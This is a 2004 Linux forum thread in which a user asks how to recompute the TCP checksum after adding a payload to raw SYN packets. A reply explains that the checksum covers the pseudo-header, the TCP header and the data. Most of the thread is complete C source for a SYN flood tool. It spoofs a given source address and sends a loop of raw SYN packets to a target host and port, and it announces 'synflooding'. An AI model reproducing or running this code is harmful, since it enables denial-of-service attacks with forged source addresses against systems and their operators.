LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Non-*NIX Forums > Programming
User Name
Password
Programming This forum is for all programming questions.
The question does not have to be directly related to Linux and any language is fair game.

Notices


Reply
  Search this Thread
Old 04-01-2004, 01:06 AM   #1
GodSendDeath
Member
 
Registered: Mar 2004
Posts: 71

Rep: Reputation: 15
Raw Syn Packet with Data


I am trying to write a raw Syn packet that contains data, like "hello" or "whats up". I can add the data to the packet with the addition of char data[9], but I cant recalculate the TCP Checksum. Its always incorrect. I am using ethereal to compare values. What do I have to do in order to have a correct TCP checksum with the addition of a data payload? The following is the (not mine) code:

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>

void hose_trusted(unsigned int, unsigned int, unsigned short, int);
unsigned short in_cksum(unsigned short *, int);
unsigned int host2ip(char *);

main(int argc, char **argv)
{
unsigned int srchost;
unsigned int dsthost;
unsigned short port=80;
unsigned int number=1000;
if(argc < 3)
{
printf("%s srchost dsthost port num\n", argv[0]);
exit(0);
}
srchost = host2ip(argv[1]);
dsthost = host2ip(argv[2]);
if(argc >= 4) port = atoi(argv[3]);
if(argc >= 5) number = atoi(argv[4]);
if(port == 0) port = 80;
if(number == 0) number = 1000;
printf("synflooding %s from %s port %u %u times\n", argv[2], argv[1], port, number);
hose_trusted(srchost, dsthost, port, number);
}

void hose_trusted(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, int numsyns)
{
struct send_tcp
{
struct iphdr ip;
struct tcphdr tcp;
char data[9];
} send_tcp;

memset(send_tcp.data, 0, sizeof(send_tcp.data));
strcpy(send_tcp.data, "hello");

struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
} pseudo_header;
int i;
int tcp_socket;
struct sockaddr_in sin;
int sinlen;

/* form ip packet */
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 0;
send_tcp.ip.tot_len = htons(40);
send_tcp.ip.id = getpid();
send_tcp.ip.frag_off = 0;
send_tcp.ip.ttl = 255;
send_tcp.ip.protocol = IPPROTO_TCP;
send_tcp.ip.check = 0;
send_tcp.ip.saddr = source_addr;
send_tcp.ip.daddr = dest_addr;

/* form tcp packet */
send_tcp.tcp.source = getpid();
send_tcp.tcp.dest = htons(dest_port);
send_tcp.tcp.seq = getpid();
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.doff = 5;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.res2 = 0;
send_tcp.tcp.window = htons(512);
send_tcp.tcp.check = 0;
send_tcp.tcp.urg_ptr = 0;

/* setup the sin struct */
sin.sin_family = AF_INET;
sin.sin_port = send_tcp.tcp.source;
sin.sin_addr.s_addr = send_tcp.ip.daddr;

/* (try to) open the socket */
tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(tcp_socket < 0)
{
perror("socket");
exit(1);
}

for(i=0;i < numsyns;i++)
{
/* set fields that need to be changed */
send_tcp.tcp.source++;
send_tcp.ip.id++;
send_tcp.tcp.seq++;
send_tcp.tcp.check = 0;
send_tcp.ip.check = 0;

/* calculate the ip checksum */
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);

/* set the pseudo header fields */
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
sinlen = sizeof(sin);
sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
}
close(tcp_socket);
}

unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */

/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/

sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}

/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}

/*
* Add back carry outs from top 16 bits to low 16 bits.
*/

sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}

unsigned int host2ip(char *hostname)
{
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if(i.s_addr == -1)
{
h = gethostbyname(hostname);
if(h == NULL)
{
fprintf(stderr, "cant find %s!\n", hostname);
exit(0);
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}


This is really bothering me. Please help!

-GSD
 
Old 04-06-2004, 12:54 PM   #2
GodSendDeath
Member
 
Registered: Mar 2004
Posts: 71

Original Poster
Rep: Reputation: 15
I have found and read about libnet and I have been using that. I am able to send a TCP Syn packet with a payload. However, I would still like to find out how to add a payload to the code posted above. If anyone has an idea, please reply! Thank you!

-GSD
 
Old 04-06-2004, 02:05 PM   #3
infamous41md
Member
 
Registered: Mar 2003
Posts: 804

Rep: Reputation: 30
the checksum is supposed to cover the tcp header and data, as well as the 12 byte pseudoheader.
 
Old 04-06-2004, 05:03 PM   #4
GodSendDeath
Member
 
Registered: Mar 2004
Posts: 71

Original Poster
Rep: Reputation: 15
So should I add a member in pseudo_header named "char data[9]" and recalculate the checksum with the newly defined pseudo_header? I'm not 100% sure how to implement your reply. If you could show me code modification or an example in the form of code, I would greatly appreciate it!

-GSD
 
Old 04-06-2004, 05:53 PM   #5
infamous41md
Member
 
Registered: Mar 2003
Posts: 804

Rep: Reputation: 30
Code:
[pseudo header]  }
[tcp header]     } - tcp checksum covers these 3
[tcp data]       }
set tcp sum to 0, copy pseudo header into a buffer, append tcp header, append tcp data, call checksum function passing pointer to start of buffer and combined length of all 3 pieces.

Last edited by infamous41md; 04-06-2004 at 05:54 PM.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
how do i read the data in the packet that i have captured after packet capture? gajaykrishnan Programming 23 04-19-2006 06:09 AM
reading raw data in to memory whizbit Programming 77 07-07-2005 11:20 AM
TCP packet flags (SYN, FIN, ACK, etc) and firewall rules TheLinuxDuck Linux - Security 12 04-29-2005 12:30 AM
nmap raw packet sendto error in Mandrake 9.2 conn-fused Linux - Networking 0 06-30-2004 03:11 PM
Raw Packet Data vanibhat Linux - Security 1 08-01-2003 08:42 AM

LinuxQuestions.org > Forums > Non-*NIX Forums > Programming

All times are GMT -5. The time now is 11:54 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration